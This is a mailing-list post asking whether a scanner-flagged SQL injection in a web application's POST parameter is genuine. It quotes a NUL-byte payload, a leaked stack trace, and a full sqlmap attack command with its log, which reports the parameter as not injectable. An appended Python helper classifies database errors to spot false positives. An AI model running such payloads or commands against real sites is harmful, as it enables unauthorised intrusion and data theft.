Hi All
I'm having problems with an injection that I think is real.
It's a standard POST request with one of the parameters of the data sent
being vulnerable. This all happens in an unauthenticated area of the
application, so there's no need to set the cookie value etc.
The injection point was found with Burp Scanner. It has the following to
say:
*Issue detail*
The BLAH parameter appears to be vulnerable to SQL injection attacks. The
payload %00' was submitted in the BLAH parameter, and a database error
message was returned. You should review the contents of the error message,
and the application's handling of other input, to confirm whether a
vulnerability is present. The database appears to be PostgreSQL. The
application attempts to block SQL injection attacks but this can be
circumvented by submitting a URL-encoded NULL byte (%00) before the
characters that are being blocked.
The server response looks like this:
HTTP/1.1 202 Accepted
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/xml;charset=UTF-8
Date: Wed, 14 Dec 2011 12:48:30 GMT
Content-Length: 7754
<?xml version="1.0" encoding="UTF-8"?>
<errors><error><text><![CDATA[could not load an entity:
[vyre.content.CollectionSchema#165']; nested exception is
org.hibernate.exception.DataException: could not load an entity:
[vyre.content.CollectionSchema#165']]]></text><stack-trace><![CDATA[org.springframework.dao.InvalidDataAccessResourceUsageException:
could not load an entity: [vyre.content.CollectionSchema#165']
    at org.springframework.orm.hibernate3.SessionFactoryUtils.convertHibernateAccessException(SessionFactoryUtils.java:618)
    at org.springframework.orm.hibernate3.HibernateAccessor.convertHibernateAccessException(HibernateAccessor.java:412)
    at org.springframework.orm.hibernate3.HibernateTemplate.doExecute(HibernateTemplate.java:424)
    at org.springframework.orm.hibernate3.HibernateTemplate.executeWithNativeSession(HibernateTemplate.java:374)
    at org.springframework.orm.hibernate3.HibernateTemplate.load(HibernateTemplate.java:560)
    at org.springframework.orm.hibernate3.HibernateTemplate.load(HibernateTemplate.java:554)
    at vyre.core.entity.pl.HibernateStringIdentifierEntityDAO.load(HibernateStringIdentifierEntityDAO.java:47)
    at sun.reflect.GeneratedMethodAccessor49.invoke(Unknown Source)
    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
    at java.lang.reflect.Method.invoke(Method.java:597)
    at org.springframework.aop.support.AopUtils.invokeJoinpointUsingReflection(AopUtils.java:310)
    at org.springframework.aop.framework.ReflectiveMethodInvocation.invokeJoinpoint(ReflectiveMethodInvocation.java:182)
    at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:149)
    at org.springframework.transaction.interceptor.TransactionInterceptor.invoke(TransactionInterceptor.java:106)
    at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:171)
    at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204)
    at $Proxy17.load(Unknown Source)
    at vyre.publishing.ContentGatewayAjaxListener.handle(ContentGatewayAjaxListener.java:146)
    at vyre.publishing.ajax.AjaxControllerServlet.service(AjaxControllerServlet.java:88)
    at javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at vyre.delivery.MainFilter.doFilter(MainFilter.java:145)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at vyre.content.search.permissions.ViewPermissionFilter.doFilter(ViewPermissionFilter.java:27)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at org.springframework.orm.hibernate3.support.OpenSessionInViewFilter.doFilterInternal(OpenSessionInViewFilter.java:198)
    at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:76)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at com.virginholidays.filter.CacheControlFilter.doFilter(CacheControlFilter.java:26)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at vyre.utils.filters.login.AbstractLoginFilter.doFilter(AbstractLoginFilter.java:95)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:233)
    at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:191)
    at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:128)
    at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)
    at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109)
    at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:568)
    at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:286)
    at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:845)
    at org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:583)
    at org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:447)
    at java.lang.Thread.run(Thread.java:619)
Caused by: org.hibernate.exception.DataException: could not load an entity: [vyre.content.CollectionSchema#165']
    at org.hibernate.exception.SQLStateConverter.convert(SQLStateConverter.java:77)
    at org.hibernate.exception.JDBCExceptionHelper.convert(JDBCExceptionHelper.java:43)
    at org.hibernate.loader.Loader.loadEntity(Loader.java:1874)
    at org.hibernate.loader.entity.AbstractEntityLoader.load(AbstractEntityLoader.java:48)
    at org.hibernate.loader.entity.AbstractEntityLoader.load(AbstractEntityLoader.java:42)
    at org.hibernate.persister.entity.AbstractEntityPersister.load(AbstractEntityPersister.java:3049)
    at org.hibernate.event.def.DefaultLoadEventListener.loadFromDatasource(DefaultLoadEventListener.java:399)
    at org.hibernate.event.def.DefaultLoadEventListener.doLoad(DefaultLoadEventListener.java:375)
    at org.hibernate.event.def.DefaultLoadEventListener.load(DefaultLoadEventListener.java:139)
    at org.hibernate.event.def.DefaultLoadEventListener.proxyOrLoad(DefaultLoadEventListener.java:179)
    at org.hibernate.event.def.DefaultLoadEventListener.onLoad(DefaultLoadEventListener.java:103)
    at org.hibernate.impl.SessionImpl.fireLoad(SessionImpl.java:878)
    at org.hibernate.impl.SessionImpl.load(SessionImpl.java:795)
    at org.hibernate.impl.SessionImpl.load(SessionImpl.java:788)
    at org.springframework.orm.hibernate3.HibernateTemplate$3.doInHibernate(HibernateTemplate.java:566)
    at org.springframework.orm.hibernate3.HibernateTemplate.doExecute(HibernateTemplate.java:419)
    ... 46 more
Caused by: org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding "UTF8": 0x00
    at org.postgresql.core.v3.QueryExecutorImpl.receiveErrorResponse(QueryExecutorImpl.java:2102)
    at org.postgresql.core.v3.QueryExecutorImpl.processResults(QueryExecutorImpl.java:1835)
    at org.postgresql.core.v3.QueryExecutorImpl.execute(QueryExecutorImpl.java:257)
    at org.postgresql.jdbc2.AbstractJdbc2Statement.execute(AbstractJdbc2Statement.java:500)
    at org.postgresql.jdbc2.AbstractJdbc2Statement.executeWithFlags(AbstractJdbc2Statement.java:388)
    at org.postgresql.jdbc2.AbstractJdbc2Statement.executeQuery(AbstractJdbc2Statement.java:273)
    at org.apache.commons.dbcp.DelegatingPreparedStatement.executeQuery(DelegatingPreparedStatement.java:96)
    at org.apache.commons.dbcp.DelegatingPreparedStatement.executeQuery(DelegatingPreparedStatement.java:96)
    at org.hibernate.jdbc.AbstractBatcher.getResultSet(AbstractBatcher.java:186)
    at org.hibernate.loader.Loader.getResultSet(Loader.java:1787)
    at org.hibernate.loader.Loader.doQuery(Loader.java:674)
    at org.hibernate.loader.Loader.doQueryAndInitializeNonLazyCollections(Loader.java:236)
    at org.hibernate.loader.Loader.loadEntity(Loader.java:1860)
    ... 59 more
]]></stack-trace></error></errors>
I've worked my way up to the following sqlmap command:
C:\Program Files\sqlmap>python sqlmap.py -u "http://www.**********/servlet/ajax" --data "..........&BLAH=165" -p BLAH --level=5 --risk=2 --dbms=postgresql --union-char=1 --tamper=appendnullbyte -f -b
sqlmap/1.0-dev (r4577) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:33:52
[15:33:52] [INFO] loading tamper script 'appendnullbyte'
[15:33:53] [INFO] using '*****\session' as session file
[15:33:53] [INFO] testing connection to the target url
[15:34:00] [WARNING] provided parameter 'BLAH' is not inside the Cookie
[15:34:00] [INFO] testing if the url is stable, wait a few seconds
[15:34:03] [INFO] url is stable
[15:34:03] [INFO] heuristic test shows that POST parameter 'BLAH' might be
injectable (possible DBMS: PostgreSQL)
[15:34:03] [INFO] testing sql injection on POST parameter 'BLAH'
[15:34:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:34:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause
(Generic comment)'
[15:34:16] [INFO] testing 'Generic boolean-based blind - Parameter replace
(original value)'
[15:34:16] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER
BY clauses'
[15:34:16] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER
BY clauses (original value)'
[15:34:16] [INFO] testing 'PostgreSQL boolean-based blind - Parameter
replace (GENERATE_SERIES - original value)'
[15:34:17] [INFO] testing 'PostgreSQL stacked conditional-error blind
queries'
[15:34:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING
clause'
[15:34:27] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING
clause'
[15:34:32] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[15:34:32] [INFO] testing 'PostgreSQL error-based - GROUP BY and ORDER BY
clauses'
[15:34:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:34:35] [INFO] testing 'PostgreSQL stacked queries (heavy query)'
[15:34:37] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'
[15:34:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:34:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)'
[15:34:44] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[15:34:47] [INFO] testing 'PostgreSQL AND time-based blind (heavy query -
comment)'
[15:34:49] [INFO] testing 'Generic UNION query (1) - 1 to 10 columns'
[15:34:50] [INFO] target url appears to be UNION injectable with 1 columns
[15:34:51] [INFO] target url appears to be UNION injectable with 1 columns
[15:34:53] [INFO] target url appears to be UNION injectable with 1 columns
[15:34:55] [INFO] target url appears to be UNION injectable with 1 columns
[15:34:56] [INFO] target url appears to be UNION injectable with 1 columns
[15:34:58] [INFO] target url appears to be UNION injectable with 1 columns
[15:34:59] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:01] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:02] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:04] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:06] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:07] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:09] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:10] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:11] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:13] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:14] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:16] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:17] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:19] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:20] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:22] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:23] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:25] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:27] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:29] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:30] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:32] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:33] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:35] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:36] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:37] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:39] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:40] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:42] [INFO] target url appears to be UNION injectable with 1 columns
[15:35:42] [INFO] testing 'Generic UNION query (1) - 11 to 20 columns'
[15:36:29] [INFO] testing 'Generic UNION query (1) - 21 to 30 columns'
[15:37:15] [INFO] testing 'Generic UNION query (1) - 31 to 40 columns'
[15:38:01] [INFO] testing 'Generic UNION query (1) - 41 to 50 columns'
[15:38:46] [INFO] testing 'Generic UNION query (NUL comment) (1) - 1 to 10
columns'
[15:38:47] [INFO] target url appears to be UNION injectable with 1 columns
[15:38:50] [INFO] target url appears to be UNION injectable with 1 columns
[15:38:51] [INFO] target url appears to be UNION injectable with 1 columns
[15:38:53] [INFO] target url appears to be UNION injectable with 1 columns
[15:38:54] [INFO] target url appears to be UNION injectable with 1 columns
[15:38:56] [INFO] target url appears to be UNION injectable with 1 columns
[15:38:57] [INFO] target url appears to be UNION injectable with 1 columns
[15:38:59] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:00] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:03] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:04] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:05] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:07] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:08] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:10] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:11] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:13] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:14] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:16] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:18] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:19] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:21] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:22] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:24] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:25] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:27] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:28] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:30] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:31] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:33] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:35] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:37] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:38] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:40] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:41] [INFO] target url appears to be UNION injectable with 1 columns
[15:39:41] [INFO] testing 'Generic UNION query (NUL comment) (1) - 11 to 20
columns'
[15:40:27] [INFO] testing 'Generic UNION query (NUL comment) (1) - 21 to 30
columns'
[15:41:11] [INFO] testing 'Generic UNION query (NUL comment) (1) - 31 to 40
columns'
[15:41:56] [INFO] testing 'Generic UNION query (NUL comment) (1) - 41 to 50
columns'
[15:42:42] [WARNING] POST parameter 'BLAH' is not injectable
[15:42:42] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. Please, consider usage of tampering scripts as your target might filter the queries. Also, you can try to rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details
[*] shutting down at 15:42:42
I didn't start with all of those arguments for sqlmap - I've tried it
without: --level=5, --risk=2, --dbms=postgresql, --union-char=1 and
--tamper=appendnullbyte and got pretty much the same results for each.
Maybe it's not injectable, but I'd like people's input before I write it
off, since it looks very suspect to me.
Thanks
Chris
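A triage helper for a response like the one above, added here as an example; it is not part of Chris's post and not sqlmap code. The frames that matter are visible in the trace: PostgreSQL raises `invalid byte sequence for encoding "UTF8": 0x00` when a NUL arrives inside a value, the query ran through `DelegatingPreparedStatement.executeQuery`, and Hibernate echoes the identifier it tried to load as the literal `165'`, quote included, which together indicate the payload was bound as data rather than parsed as SQL. The sample response is a constructed, cut-down copy of the one above, and the message patterns and verdict labels are my own.

```python
import re

# Constructed sample, cut down from the XML error body quoted in the post above.
SAMPLE_RESPONSE = """\
<errors><error><text><![CDATA[could not load an entity:
[vyre.content.CollectionSchema#165']; nested exception is
org.hibernate.exception.DataException: could not load an entity:
[vyre.content.CollectionSchema#165']]]></text><stack-trace><![CDATA[
    at vyre.core.entity.pl.HibernateStringIdentifierEntityDAO.load(HibernateStringIdentifierEntityDAO.java:47)
Caused by: org.postgresql.util.PSQLException: ERROR: invalid byte sequence
for encoding "UTF8": 0x00
    at org.apache.commons.dbcp.DelegatingPreparedStatement.executeQuery(DelegatingPreparedStatement.java:96)
    at org.hibernate.loader.Loader.loadEntity(Loader.java:1874)
]]></stack-trace></error></errors>"""

# Constructed contrast case: what PostgreSQL says when a quote really broke the SQL text.
SAMPLE_SYNTAX_ERROR = 'org.postgresql.util.PSQLException: ERROR: syntax error at or near "\'"'

# Messages that mean the SQL text itself failed to parse (input reached the parser as SQL).
SYNTAX_PATTERNS = (r"syntax error at or near", r"unterminated quoted string")
# Messages that mean the input reached the server as a value and was rejected as data.
DATA_PATTERNS = (r"invalid byte sequence for encoding", r"invalid input syntax for")


def triage(response, payload):
    """Classify a leaked PostgreSQL error by what it reveals about how the input was used."""
    flat = re.sub(r"\s+", " ", response)  # undo line wrapping before matching
    syntax_error = any(re.search(p, flat) for p in SYNTAX_PATTERNS)
    data_error = any(re.search(p, flat) for p in DATA_PATTERNS)
    # A PreparedStatement frame means the value travelled as a bind parameter, not in the SQL string.
    prepared = "PreparedStatement" in flat
    # Hibernate echoes the identifier it tried to load as "[Class#id]"; pull out the id.
    m = re.search(r"#([^\]]+)\]", flat)
    echoed_id = m.group(1) if m else None
    # The NUL itself is not printable, so compare on the visible part of the payload.
    visible = payload.replace("\x00", "")
    payload_bound = echoed_id is not None and echoed_id.endswith(visible)
    if syntax_error:
        verdict = "likely injectable: the input was parsed as part of the SQL text"
    elif data_error and (prepared or payload_bound):
        verdict = "likely false positive: the input was rejected as a bound value"
    else:
        verdict = "inconclusive: the error does not show how the input was used"
    return {
        "syntax_error": syntax_error,
        "data_error": data_error,
        "prepared_statement": prepared,
        "echoed_id": echoed_id,
        "verdict": verdict,
    }


if __name__ == "__main__":
    print(triage(SAMPLE_RESPONSE, "\x00'")["verdict"])
    print(triage(SAMPLE_SYNTAX_ERROR, "'")["verdict"])
```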
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users